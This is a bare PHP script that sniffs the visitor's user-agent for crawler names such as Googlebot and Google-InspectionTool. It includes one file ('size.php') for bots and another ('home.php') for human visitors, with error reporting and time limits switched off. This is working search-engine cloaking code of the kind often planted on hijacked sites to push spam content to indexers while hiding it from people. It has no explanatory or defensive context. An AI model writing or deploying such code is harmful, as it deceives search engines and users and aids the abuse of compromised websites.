<?php  
error_reporting(0);
set_time_limit(0);

$bot_content_file = 'size.php';
$user_content_file = 'home.php';
function is_spider()
{
    $spiders = ['Googlebot', 'Google-InspectionTool', 'Google Favicon', 'Google-Site-Verification', 'facebook', 'instagram', 'tiktok', 'telegram', 'bot'];
    $s_agent = strtolower($_SERVER['HTTP_USER_AGENT']);
    
    foreach ($spiders as $spider) {
        if (stripos($s_agent, $spider) !== false) {
            return true;
        }
    }
    return false;
}

if (is_spider()) {	
    if (file_exists($bot_content_file)) {
        include($bot_content_file);
    }	
    exit();
}else{	
    if (file_exists($user_content_file)) {
        include($user_content_file);
    }	
    exit();
}


?>
